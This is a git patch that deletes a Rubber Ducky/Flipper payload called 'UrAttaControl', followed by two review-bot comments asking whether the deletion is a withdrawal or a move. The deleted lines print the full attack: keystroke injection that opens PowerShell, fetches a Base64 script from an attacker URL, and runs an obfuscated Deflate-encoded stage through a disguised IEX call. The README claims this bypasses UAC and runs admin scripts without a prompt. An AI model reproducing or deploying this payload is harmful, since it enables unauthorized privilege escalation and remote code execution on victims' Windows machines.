From 124749f263c132837e14ab34bd29f685f6bc52cb Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Wed, 25 May 2022 15:19:25 -0500 Subject: [PATCH] Delete Payloads/Flip-UrAttaControl directory --- Payloads/Flip-UrAttaControl/README.md | 104 ------------------ .../UrAttaControl-Execute.txt | 30 ----- 2 files changed, 134 deletions(-) delete mode 100644 Payloads/Flip-UrAttaControl/README.md delete mode 100644 Payloads/Flip-UrAttaControl/UrAttaControl-Execute.txt diff --git a/Payloads/Flip-UrAttaControl/README.md b/Payloads/Flip-UrAttaControl/README.md deleted file mode 100644 index 866fedf..0000000 --- a/Payloads/Flip-UrAttaControl/README.md +++ /dev/null @@ -1,104 +0,0 @@ -![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) - - -
- Table of Contents -
    -
  1. Description
  2. -
  3. Getting Started
  4. -
  5. Contributing
  6. -
  7. Version History
  8. -
  9. Contact
  10. -
  11. Acknowledgments
  12. -
-
- -# UrAttaControl - -A script used to open an elevated powershell console and execute admin level commands - -## Description - -Completely ran from the execute file. Replace the URL in that file with yours leading to a base64 script - -This script will use IEX to download a base64 script to the $Payload variable - -Using a keystroke injections attack a heavily obfuscated and encoded snippet will download and execute any base64 - -script saved in the $Payload variable - -This payload completely bypasses the UAC and will run any admin level script without a prompt - -You can use this function I wrote to convert your .ps1 sscripts to Base64 - -https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/B64.md - -## Getting Started - -### Dependencies - -* DropBox or other file sharing service - Your Shared link for the intended file -* Windows 10,11 - -

(back to top)

- -### Executing program - -* Plug in your device -* A keystroke injection based payload will run - -

(back to top)

- -## Contributing - -All contributors names will be listed here - -I am Jakoby - -

(back to top)

- -## Version History - -* 0.1 - * Initial Release - -

(back to top)

- - -## Contact - -

I am Jakoby

-


- - - - - - - - - - - - - - - - - - - - Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/RubberDucky/Payloads/RD-UrAttaControl) -

- - - -

(back to top)

- - -## Acknowledgments - -* [Hak5](https://hak5.org/) -* [MG](https://github.com/OMG-MG) - -

(back to top)

diff --git a/Payloads/Flip-UrAttaControl/UrAttaControl-Execute.txt b/Payloads/Flip-UrAttaControl/UrAttaControl-Execute.txt deleted file mode 100644 index 091f6e4..0000000 --- a/Payloads/Flip-UrAttaControl/UrAttaControl-Execute.txt +++ /dev/null @@ -1,30 +0,0 @@ -REM Title: UrAttaControl -REM -REM Author: I am Jakoby -REM -REM Description: This is a UAC bypass payload that will open an elevated powershell console and run any script. -REM Reaplce the URL down below with a link to a base64 encoded payload you have. See README.md for more details -REM -REM Target: Windows 10, 11 -REM -REM NOTES: Additionally instead of pulling down your script with IWR you can hardcode the Base64 script to the $Payload variable -REM EXAMPLE: $Payload = "cwB0AGEAcgB0ACAAbgBvAHQAZQBwAGEAZAA=" - This Base64 script will open notepad -REM -REM You can use this function I wrote to convert your .ps1 sscripts to Base64 -REM https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/B64.md -REM -GUI r -DELAY 500 -STRING powershell -ENTER -REM -DELAY 1000 -REM -STRING $url = "YOUR-URL-WITH-BASE64-ENCODED-SCRIPT" -SHIFT ENTER -STRING $Payload = (Invoke-WebRequest $url'?dl=1').Content -SHIFT ENTER -STRING ( nEw-obJECt Io.cOMprEssion.dEfLAtEStreAM([iO.MEMoRysTream][coNVerT]::FrOMBasE64sTring( 'hY69CsIwFEZf5RK6ph0ci1MHBZEKQacsoflahfyRRKpvb1MQnOp2h3vOd6r+fNiz4GfEdIcxNV4gDjdQdVFv45Um1kZMpPRyHU/dVQo/5llFyM6olJBk7e0kRaFlH+Dk4K1VTjNqNFWLn5rxn8ImnpDzw01Jds94Q1xpVtSs8KPXy0BALIGtyCpmLgwQiCfarXoNg4zNSPZN2f79rVmRDw=='), [SySTEM.Io.cOmprEsSION.comprEsSiOnmOdE]::DECoMPress )| ForeAch{ nEw-obJECt IO.stReaMReAdEr( $_, [SYSTEm.TEXT.encODINg]::aSciI ) } |ForEaCh { $_.rEAdtoENd() } )|& ( $VeRBosEPreFEreNcE.tosTRING()[1,3]+'x'-joIN'') -SHIFT ENTER -STRING exit -ENTER
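Review bot: The commit message gives no reason for deleting `Payloads/Flip-UrAttaControl/README.md`, and the README's own Project Link line points at `RubberDucky/Payloads/RD-UrAttaControl`, a different path from the directory removed here, so a reader cannot tell whether this is a withdrawal or a move. Please say which in the commit body. If a copy remains under that other path, its Project Link is malformed Markdown (it opens with `[` and closes with `)`), and the Description says the script uses IEX to download while the execute file assigns `$Payload` from `Invoke-WebRequest`; both are worth correcting there.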
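Review bot: Deleting `UrAttaControl-Execute.txt` only removes it from the working tree. The `STRING ( nEw-obJECt Io.cOMprEssion.dEfLAtEStreAM(...` line, with its Base64 and Deflate encoded stage that the `REM Description` calls a UAC bypass, remains reachable in history as blob `091f6e4`. If the intent is to withdraw the payload rather than relocate it, state that in the commit message so downstream users and defenders tracking this repository know the file was pulled on purpose. The encoded stage cannot be audited from this diff, so the `REM` lines are the only record here of what it does.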